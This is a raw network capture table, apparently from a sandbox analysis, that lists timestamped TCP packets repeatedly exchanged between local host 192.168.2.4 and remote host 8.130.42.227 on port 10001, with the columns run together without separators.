                                                                Oct 1, 2024 09:17:28.415337086 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.415425062 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.415543079 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.420322895 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.522336006 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.527292967 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.527431011 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.527602911 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.532562017 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.481961012 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.482062101 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.482269049 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.482328892 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.600159883 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.600465059 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.605010986 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.605230093 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.605308056 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.605470896 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.610219002 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.127780914 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.127979040 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.128010988 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.128026009 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.128104925 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.132939100 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.240974903 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.245786905 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.245910883 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.246192932 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.250909090 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.766760111 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.766774893 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.766854048 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.767008066 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.771811962 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.888050079 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.892951012 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.893043995 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.893191099 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.897964954 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.850868940 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.850975037 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.850986004 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.851035118 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.851136923 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.855987072 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.959744930 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.964644909 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.964739084 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.964926004 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.969681025 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:34.933923960 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:34.933944941 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:34.934000015 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:34.934039116 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:34.934108019 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:34.938889980 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:35.037739038 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:35.042663097 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:35.042762041 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:35.042886019 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:35.047626019 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.009809971 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.009835958 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.009885073 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.009919882 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.010034084 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.014791965 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.116811037 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.121917963 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.122036934 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.122195005 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.127018929 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.091801882 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.091877937 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.091964006 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.092063904 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.209408998 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.209764004 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.214447975 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.214598894 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.214673042 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.214812040 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.219759941 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.179536104 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.179703951 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.179805040 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.186352968 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.191201925 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.303350925 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.308233976 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.308320045 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.308451891 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.313599110 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.265749931 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.265801907 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.265872002 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.265959978 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.268843889 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.273631096 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.405668020 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.410708904 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.410803080 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.414067030 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.418864965 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.358573914 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.358670950 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.358668089 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.358722925 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.358845949 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.363558054 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.475342989 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.480288982 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.480389118 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.480554104 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.485316992 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.456600904 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.456698895 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.457010031 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.457072020 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.568712950 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.569022894 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.573971033 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.573985100 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.574054003 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.574184895 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.579173088 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.535255909 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.535268068 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.535412073 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.535550117 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.540366888 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.647789955 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.655922890 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.656014919 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.656169891 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.662200928 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.632132053 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.632204056 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.632246017 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.632299900 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.632375002 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.639395952 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.740935087 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.746989012 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.747077942 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.747241974 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.752389908 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.697855949 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.697874069 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.697946072 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.697946072 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.698940039 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.703687906 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.803749084 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.808629036 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.808757067 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.808901072 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.813677073 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952497959 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952512980 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952569962 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952668905 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:45.952805042 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:45.957550049 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:46.069535017 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:46.076773882 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:46.076865911 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:46.076970100 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:46.081727982 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.050570011 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.050620079 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.050822973 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.050822973 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.050899029 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.055787086 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.164963007 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.169955969 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.170211077 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.170264959 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.175017118 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.123918056 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.123971939 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.124011993 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.124052048 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.124114037 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.128914118 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.241600037 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.248814106 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.248933077 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.249100924 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.254888058 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.197149992 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.197683096 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.197762966 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.839124918 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.839190960 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.943983078 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.944221020 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.948904037 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.948995113 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.949076891 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.949246883 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.954011917 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:17.902736902 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:17.902792931 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:17.902937889 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:17.902971029 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.065082073 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.065396070 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.069937944 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:18.070348024 CEST10001498058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:18.070411921 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.070692062 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.075716972 CEST10001498058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:19.022764921 CEST10001498058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:19.022794962 CEST10001498058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:19.022823095 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:19.022862911 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:19.022968054 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:19.027914047 CEST10001498058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:19.149755955 CEST4980610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:19.154694080 CEST10001498068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:19.154761076 CEST4980610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:19.154947042 CEST4980610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:19.160047054 CEST10001498068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:20.290249109 CEST10001498068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:20.290266991 CEST10001498068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:20.290339947 CEST4980610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:20.290409088 CEST10001498068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:20.290509939 CEST4980610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:20.290565968 CEST4980610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:20.295325041 CEST10001498068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:20.400520086 CEST4980710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:20.405602932 CEST10001498078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:20.405875921 CEST4980710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:20.406044960 CEST4980710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:20.410991907 CEST10001498078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:21.351322889 CEST10001498078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:21.351389885 CEST4980710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:21.351449966 CEST10001498078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:21.351500988 CEST4980710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:21.461546898 CEST4980710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:21.461903095 CEST4980810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:21.466463089 CEST10001498078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:21.466715097 CEST10001498088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:21.466773987 CEST4980810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:21.466885090 CEST4980810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:21.472126961 CEST10001498088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:22.404139042 CEST10001498088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:22.404211998 CEST4980810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:22.404217958 CEST10001498088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:22.404320002 CEST4980810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:22.404509068 CEST4980810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:22.409292936 CEST10001498088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:22.508508921 CEST4980910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:22.513470888 CEST10001498098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:22.516650915 CEST4980910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:22.516719103 CEST4980910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:22.521584034 CEST10001498098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:23.470350027 CEST10001498098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:23.470406055 CEST10001498098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:23.470412016 CEST4980910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:23.470463037 CEST4980910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:23.470546961 CEST4980910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:23.475291967 CEST10001498098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:23.588566065 CEST4981010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:23.593471050 CEST10001498108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:23.596642971 CEST4981010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:23.596708059 CEST4981010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:23.601568937 CEST10001498108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:24.563240051 CEST10001498108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:24.563313961 CEST4981010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:24.563431025 CEST10001498108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:24.563481092 CEST4981010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:24.680531025 CEST4981010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:24.680911064 CEST4981110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:24.686758041 CEST10001498108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:24.687403917 CEST10001498118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:24.687469959 CEST4981110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:24.687603951 CEST4981110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:24.694567919 CEST10001498118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:25.623217106 CEST10001498118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:25.623275042 CEST10001498118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:25.624597073 CEST4981110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:25.624681950 CEST4981110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:25.629446030 CEST10001498118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:25.744530916 CEST4981210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:25.749430895 CEST10001498128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:25.752697945 CEST4981210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:25.752697945 CEST4981210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:25.757637978 CEST10001498128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:26.699789047 CEST10001498128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:26.699887037 CEST4981210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:26.700146914 CEST10001498128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:26.700236082 CEST4981210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:26.811826944 CEST4981210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:26.812211990 CEST4981310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:26.816670895 CEST10001498128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:26.817035913 CEST10001498138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:26.817101955 CEST4981310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:26.817373991 CEST4981310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:26.822197914 CEST10001498138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:27.765852928 CEST10001498138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:27.765938044 CEST10001498138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:27.768610954 CEST4981310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:27.768759012 CEST4981310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:27.773545027 CEST10001498138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:27.884516001 CEST4981410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:27.889570951 CEST10001498148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:27.892607927 CEST4981410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:27.892714977 CEST4981410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:27.897514105 CEST10001498148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:28.877537966 CEST10001498148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:28.877590895 CEST4981410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:28.878246069 CEST10001498148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:28.878284931 CEST4981410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:28.992733955 CEST4981410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:28.993223906 CEST4981510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:28.997646093 CEST10001498148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:28.998399973 CEST10001498158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:28.998471022 CEST4981510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:28.998631954 CEST4981510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:29.003521919 CEST10001498158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:29.989542961 CEST10001498158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:29.989615917 CEST10001498158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:29.989644051 CEST4981510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:29.989723921 CEST4981510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:30.101844072 CEST4981510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:30.102240086 CEST4981610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:30.106657028 CEST10001498158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:30.107014894 CEST10001498168.130.42.227192.168.2.4
